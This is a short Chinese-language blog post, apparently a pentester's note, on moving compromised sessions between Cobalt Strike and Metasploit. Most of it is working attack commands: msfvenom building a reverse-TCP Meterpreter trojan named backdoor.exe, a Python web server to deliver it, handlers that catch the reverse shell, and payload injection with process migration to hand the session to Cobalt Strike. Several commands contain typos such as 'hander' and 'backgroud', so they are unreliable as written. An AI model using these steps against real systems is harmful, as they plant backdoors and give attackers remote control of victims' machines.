Cobalt Strike 与 MSF 联动
使用Cobalt Strike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。
一、Cobalt Strike连接MSF会话
1. 上线msf会话
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > backdoor.exe
2. python开启web服务,下载木马
python3 -m http.server 80
3. msf进行监听模式
msfconsole
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.128
set lport 4444
run
运行木马反弹shell
4. 开启Cobalt Strike
./teamserver 10.10.10.128 123456
客户端连接后,添加一个监听
5. 会话转移到CS上
backgroud
use exploit/window/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 10.10.10.128
set lport 8888
set DisablePayloadHandler True
set PrependMigrate True
sessions -l
set session 1
run
二、MSF连接Cobalt Strike会话
1. 添加一个监听,生成一个木马程序
2. 重新添加一个监听器
3. 会话转义到MSF
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 9999
set lhost 0.0.0.0
exploit
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?